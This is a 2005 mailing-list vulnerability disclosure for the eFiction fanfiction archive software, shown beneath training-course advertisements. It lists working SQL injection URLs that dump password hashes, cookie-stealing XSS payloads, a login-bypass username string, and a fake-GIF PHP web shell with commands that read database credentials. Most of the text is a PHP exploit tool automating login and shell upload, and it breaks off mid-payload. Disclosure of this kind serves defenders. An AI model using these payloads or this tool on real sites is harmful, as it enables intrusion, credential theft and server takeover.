Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

eFiction <= 2.0 multiple vulnerabilities

from [retrogod] Network Security [Permanent Link]
Subject: eFiction <= 2.0 multiple vulnerabilities
Date: 25 Nov 2005 11:22:11 -0000 
efiction <= 2.0 remote code execution / SQL injection / login bypass / cross 
site scripting / path & information disclosure

software:
site: http://www.efiction.wallflowergirl.com/index.php
description: "Efiction is a software program that enables users to run 
automated original or fanfiction
archives on their websites. The program is PHP and MySQL database driven and is 
released as open-source software."


i)
xss:
efiction 1.0/1.1:
http://[target]/efiction/titles.php?action=viewlist&let=<script>alert(document.cookie)</script>
on version 2.0, thorugh sql injection:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)</script>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

ii)
if magic_quotes_gpc off -> SQL INJECTION:
you can see at screen any admin/user MD5 password hash

efiction 1.0:
http://[target]/[path]/authors.php?action=viewlist&let='%20UNION%20SELECT%20password,0%20FROM%20fanfiction_authors/*
http://[target]/[path]/authors.php?action=viewlist&let=%27%20UNION%20SELECT%20password,password%20FROM%20efiction_fanfiction_authors/*&offset=0,40/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,penname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*

efiction 1.1:
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20password,0,0,0,0,0,penname,0,0,0,0,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%20penname,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewuser.php?uid='UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,password,0,0,0,0%20FROM%20fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20efiction_fanfiction_authors%20/*
http://[target]/[path]/viewstory.php?sid='%20UNION%20SELECT%20penname,penname,password,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname,penname%20FROM%20fanfiction_authors%20/*

efiction 2.0
http://[target]/[path]/titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*

iii)
if magic_quotes_gpc off -> Login bypass:
you can login as admin typing:

efiction 1.0:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email FROM 
fanfiction_authors where level=1/*
password: [nothing]

efiction 1.1:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories 
FROM fanfiction_authors where level=1/*
password: [nothing]

efiction 2.0:
username: 'UNION SELECT 
'd41d8cd98f00b204e9800998ecf8427e',penname,uid,userskin,level,email,categories,ageconsent
 FROM fanfiction_authors where level=1/*
password: [nothing]                   ^
                                      |
                                      |
                                 this is the hash of [nothing]

iv)

remote code execution (1.0/1.1/2.0):

register, a temporary password will be sent to you by email, login, goto 
"Manage Images"
(or go to http://target/path/user.php?action=manageimages&upload=upload), 
choose "Upload new image", upload a fake gif cmd.php
like this (this is the hexadecimal dump):

00000000:47 49 46 38 39 61 01 00 01 00 f7 00 00 a4 b6 a4    GIF89a....÷..¤¶¤
00000010:16 00 00 f4 00 00 77 00 00 6b 00 4c 15 00 00 f4    ...ô..w..k.L...ô
00000020:00 69 77 00 00 f8 00 6e 62 00 00 15 00 67 00 00    .iw..ø.nb....g..
00000030:00 34 00 75 00 00 00 00 00 61 c0 00 00 00 00 00    .4.u.....aÀ.....
00000040:00 00 00 00 00 00 00 00 00 89 00 00 1c 00 00 00    .........?......
00000050:00 00 00 00 00 a9 00 00 20 00 00 00 00 00 00 00    .....©.. .......
00000060:00 6f 00 00 00 00 00 00 00 00 00 00 00 56 00 00    .o...........V..
00000070:00 00 00 3c 3f 70 68 70 20 65 72 72 6f 72 5f 72    ...<?php error_r
00000080:65 70 6f 72 74 69 6e 67 28 30 29 3b 69 6e 69 5f    eporting(0);ini_
00000090:73 65 74 28 22 6d 61 78 5f 65 78 65 63 75 74 69    set("max_executi
000000a0:6f 6e 5f 74 69 6d 65 22 2c 30 29 3b 73 79 73 74    on_time",0);syst
000000b0:65 6d 28 24 5f 47 45 54 5b 63 6d 64 5d 29 3b 3f    em($_GET[cmd]);?
000000c0:3e 38 00 00 e5 00 00 12 00 00 00 00 00 00 00 98    >8..å..........?
000000d0:01 00 cc 00 00 15 00 00 00 58 00 10 e6 00 04 12    ..Ì......X..æ...
000000e0:00 10 00 00 04 05 00 01 90 00 00 f6 00 00 77 00    ........?..ö..w.
000000f0:00 c8 00 10 d5 00 e8 f5 00 12 77 00 00 ff 00 13    .È..Õ.èõ..w..ÿ..
00000100:ff 00 6c ff 00 6c ff 00 74 6a 00 03 16 00 00 f4    ÿ.lÿ.lÿ.tj.....ô
00000110:00 00 77 00 00 c4 00 30 1e 00 75 e5 00 15 77 00    ..w..Ä.0..uå..w.
00000120:00 00 00 00 00 00 00 15 00 00 00 00 00 00 00 dc    ...............Ü
00000130:00 00 e7 00 00 12 00 00 00 70 00 01 59 00 00 18    ..ç......p..Y...
00000140:00 00 00 00 00 04 00 88 01 00 e8 05 00 12 01 00    .......?..è.....
00000150:00 6c 00 04 e3 00 42 12 00 6e 00 00 74 7e 00 30    .l..ã.B..n..t~.0
00000160:00 00 87 00 00 6e c0 00 74 00 00 ff 00 00 ff 00    ..?..nÀ.t..ÿ..ÿ.
00000170:00 ff 00 00 ff ff 00 d6 ff 00 32 ff 00 6e ff 00    .ÿ..ÿÿ.Öÿ.2ÿ.nÿ.
00000180:74 ff 00 6c ff 00 5b ff 00 e5 ff 00 77 00 00 53    tÿ.lÿ.[ÿ.åÿ.w..S
00000190:00 00 15 00 00 53 00 00 00 00 00 00 00 00 00 00    .....S..........
000001a0:00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00    ................
000001b0:00 6b 00 00 00 00 00 00 00 00 00 00 00 58 00 00    .k...........X..
000001c0:03 00 f0 00 00 15 00 00 00 06 00 00 f6 00 00 e4    ..ð.........ö..ä
000001d0:00 00 77 00 00 0f 00 00 1e 00 00 e5 00 00 77 00    ..w........å..w.
000001e0:00 00 00 00 01 00 00 00 00 00 00 00 00 f8 74 00    .............øt.
000001f0:62 e7 00 01 12 00 00 00 00 00 c8 68 00 28 32 15    bç........Èh.(2.
00000200:e5 e6 00 77 77 a4 00 ff e5 00 ff 12 00 ff 00 00    åæ.ww¤.ÿå.ÿ..ÿ..
00000210:ff 00 00 6c 00 00 5b 00 00 e5 00 00 77 fc f8 36    ÿ..l..[..å..wüø6
00000220:f7 62 00 12 15 00 00 00 00 05 00 36 90 01 00 f6    ÷b.........6?..ö
00000230:00 00 77 00 00 c8 04 d8 d5 29 ed f5 e5 12 77 77    ..w..È.ØÕ)íõå.ww
00000240:00 ff 94 ff ff e7 ff ff 12 ff ff 00 ff 6a 64 00    .ÿ?ÿÿçÿÿ.ÿÿ.ÿjd.
00000250:16 2f 00 f4 e6 00 77 77 00 e0 00 9c 18 00 e8 e5    ./.ôæ.ww.à.?..èå
00000260:00 12 77 00 00 00 ff 4e 00 ff 21 15 ff 4c 00 ff    ..w...ÿN.ÿ!.ÿL.ÿ
00000270:00 00 6f 7c 00 10 e8 00 e5 12 00 77 00 f8 00 7b    ..o|..è.å..w.ø.{
00000280:62 00 e0 15 00 4e 00 00 00 00 98 b0 01 e8 e8 00    b.à..N....?°.èè.
00000290:12 12 00 00 00 64 98 6f 2f 10 10 e6 e5 e5 77 77    .....d?o/..æååww
000002a0:77 00 10 52 00 e4 e9 00 4e 12 00 00 00 61 20 c8    w..R.äé.N....a È
000002b0:00 02 ff 6c 4f ff 00 00 7f 69 00 1c 00 01 e9 61    ..ÿlOÿ..i....éa
000002c0:00 12 00 00 00 29 94 00 00 e7 00 00 12 00 00 00    .....)?..ç......
000002d0:00 00 00 6f 00 01 10 00 00 e5 00 00 77 00 a0 00    ...o.....å..w. .
000002e0:00 3a 00 00 50 00 00 00 00 00 00 01 00 30 00 00    .:..P........0..
000002f0:00 00 00 69 00 00 61 60 00 74 f1 00 74 15 00 69    ...i..a`.tñ.t..i
00000300:00 00 00 f0 00 00 aa 00 02 47 00 00 00 21 f9 04    ...ð..ª..G...!ù.
00000310:00 00 00 00 00 2c 00 00 00 00 01 00 01 00 07 08    .....,..........
00000320:04 00 01 04 04 00 3b                               ......;

you can craft a smaller gif, try it
the uploaded file is reachable at:

http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php
(efiction 1.0/1.1)

or

http://[target]/[path_to_efiction]/stories/[user_id]/images/cmd.php
ex:
http://[target]/[path_to_efiction]/stories/1/images/cmd.php
http://[target]/[path_to_efiction]/stories/2/images/cmd.php
(efiction 2.0)


now you can launch commands redirecting the output to a temporary file:

http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=ls%20-la>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

to see database username & password:

http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../data/dbconfig.php>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README

to see database table prefix and various settings:
http://[target]/[path_to_efiction]/stories/[your_username]/images/cmd.php?cmd=cat%20../../../config.php>README
http://[target]/[path_to_efiction]/stories/[your_username]/images/README



notes: in efiction 1.0 /1.1 members are NOT allowed to upload images by default
       if efiction 2.0 members are allowed to upload images by default
       from efiction 1.1, installing the script, you can specify a different 
table prefix, try efiction_fanfiction_authors, etc.


v) path disclosure:
http://[target]/efiction/storyblock.php

vi) information disclosure:

mphhh...
http://[target]/[path]/phpinfo.php

vii) you can always check for a install.php or upgrade.php to perform some 
actions on site/database



this is the exploit tool for iv) :

<?php
#   ---efiction20_xpl.php                                 15.19 17/11/2005     #
#                                                                              #
#                 eFiction <= 2.0 fake GIF Shell Upload                        #
#                              coded by rgod                                   #
#                    site: http://rgod.altervista.org                          #
#                                                                              #
#  usage: launch from Apache, fill in requested fields, then go!               #
#                                                                              #
#  Sun-Tzu: "If fighting is sure to result in victory, then you must fight,    #
#  even though the ruler forbid it; if fighting will not result in victory,    #
#  then you must not fight even at the ruler's bidding."                       #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** eFiction <= 2.0 remote commands xctn *********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
{background-color:   #FFFFFF   !important}  input  {background-color:    #303030
!important} option {  background-color:   #303030   !important}         textarea
{background-color: #303030 !important} input {color: #1CB081 !important}  option
{color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
{background-color: #303030 !important} select {font-weight: normal;       color:
#1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
!important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
!important}     h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
********* eFiction <= 2.0 remote commands xctn **********</p><p class="Stile6">a
script  by  rgod  at        <a href="http://rgod.altervista.org"target="_blank";>
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%">  <form
name="form1" method="post"   action="'.$SERVER[PHP_SELF].'">           <p><input
type="text"  name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
/efiction/ or just / ) </span></p><p><input type="text" name="command">    <span
class="Stile5"> * specify a command , "cat ../../../data/dbconfig.php" to    see
database user & password </span></p> <p><input type="text" name="username"><span
class="Stile5"> * username...</span>   </p>   <p>   <input       type="password"
name="password"><span class="Stile5">* ... and password to eFiction, required to
upload  the  fake  gif  </span> </p> <p> <input   type="text"       name="port">
<span class="Stile5">specify  a  port   other than  80 ( default  value )</span>
</p> <p>  <input  type="text"   name="proxy"><span class="Stile5"> send  exploit
through an  HTTP proxy (ip:port)</span></p><p><input type="submit" name="Submit"
value="go!"></p></form> </td></tr></table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
                            }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
                            }
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
                              //next function to send packets
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
                   echo "socket_create() failed: reason: " . 
socket_strerror($socket) . "<br>";
                   }
              else
                  {   $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
                    echo "OK.<br>";
                    echo "Attempting to connect to ".$host." on port 
".$port."...<br>";
                    if ($proxy=='')
                   {
                     $result = socket_connect($socket, $host, $port);
                   }
                   else
                   {

                   $parts =explode(':',$proxy);
                   echo 'Connecting to '.$parts[0].':'.$parts[1].' 
proxy...<br>';
                   $result = socket_connect($socket, $parts[0],$parts[1]);
                   }
                   if ($result < 0) {
                                     echo "socket_connect() failed.\r\nReason: 
(".$result.") " . socket_strerror($result) . "<br><br>";
                                    }
                               else
                                    {
                                     echo "OK.<br><br>";
                                     $html= '';
                                     socket_write($socket, $packet, 
strlen($packet));
                                     echo "Reading response:<br>";
                                     while ($out= socket_read($socket, 2048)) 
{$html.=$out;}
                                     echo nl2br(htmlentities($html));
                                     echo "Closing socket...";
                                     socket_close($socket);

                                    }
                  }
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
      {$ock=fsockopen(gethostbyname($host),$port);
       if (!$ock) { echo 'No response from '.htmlentities($host);
                        die; }
      }
             else
           {
           $c = preg_match($proxy_regex,$proxy);
              if (!$c) {echo 'Not a valid prozy...';
                        die;
                       }
           $parts=explode(':',$proxy);
            echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
            $ock=fsockopen($parts[0],$parts[1]);
            if (!$ock) { echo 'No response from proxy...';
                        die;
                       }
           }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
echo nl2br(htmlentities($html));
}

$host=$_POST[host];$path=$_POST[path];$username=$_POST[username];
$password=$_POST[password];$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];

if (($host<>'') and ($path<>'') and ($username<>'') and ($password<>'') and 
($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the 
path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> Login
$data='-----------------------------7d53102423092a
Content-Disposition: form-data; name="penname"

'.$username.'
-----------------------------7d53102423092a
Content-Disposition: form-data; name="password"

'.$password.'
-----------------------------7d53102423092a
Content-Disposition: form-data; name="submit"

Submit
-----------------------------7d53102423092a--';

$packet="POST ".$p."user.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."user.php\r\n";;
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; 
boundary=---------------------------7d53102423092a\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host.$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(' ',$temp[1]);
$COOKIE=$temp2[0];
echo '<br>Your cookie: '.htmlentities($COOKIE);

#STEP 2 -> Upload a shell...
$SHELL=
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x3c).chr(0x3f).chr(0x70).chr(0x68).chr(0x70).
chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).chr(0x72).
chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).
chr(0x74).chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).
chr(0x29).chr(0x3b).chr(0x69).chr(0x6e).chr(0x69).chr(0x5f).
chr(0x73).chr(0x65).chr(0x74).chr(0x28).chr(0x22).chr(0x6d).
chr(0x61).chr(0x78).chr(0x5f).chr(0x65).chr(0x78).chr(0x65).
chr(0x63).chr(0x75).chr(0x74).chr(0x69).chr(0x6f).chr(0x6e).
chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x22).
chr(0x2c).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).chr(0x79).
chr(0x73).chr(0x74).chr(0x65).chr(0x6d).chr(0x28).chr(0x24).
chr(0x5f).chr(0x47).chr(0x45).chr(0x54).chr(0x5b).chr(0x63).
chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x3f).
chr(0x3e).chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
